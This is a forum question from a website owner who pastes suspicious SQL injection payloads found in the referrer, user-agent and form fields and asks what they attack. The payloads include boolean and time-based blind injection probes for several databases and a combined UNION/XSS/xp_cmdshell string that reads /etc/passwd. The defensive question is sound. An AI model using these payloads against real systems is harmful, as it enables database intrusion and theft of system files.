I recently started receiving some really strange http traffic, and I'd like to understand what it's trying to do. Some of it seems like sql injection attempts, but the strings are appearing in the referrer URL and in the user-agent as well as in the form parameters, which is confusing to me. Please can you explain what vulnerabilities these are trying to attack, and whether I should be concerned about them?
weird maths:
-1' OR 2+502-502-1=0+0+0+1 --
-1\x22 OR 2+613-613-1=0+0+0+1 --
" AND 2*3*8=6*8 AND "K9Ap"="K9Ap
trying to wait for 15 seconds:
<alphanumerics>'; waitfor delay '0:0:15' --
<alphanumerics>' OR 857=(SELECT 857 FROM PG_SLEEP(15))--
if(now()=sysdate(),sleep(15),0)
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'\x22+(select(0)from(select(sleep(3)))v)+\x22*/
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
something with Postgres?
||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||
javascript and sql and /etc/passwd?
?<alphanumerics>=7995 AND 1<1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
Just to put these in context, this is a low-traffic website, no logins, no password fields, no user data to steal, no apparent target. So could this just be a "scattergun" approach to spray requests around randomly and see what bounces back?
I just can't imagine what useful information could bounce back when stuff like this is put in the user agent or the referrer url - what is the sender trying to achieve? Or could it just be a harmless misconfigured script?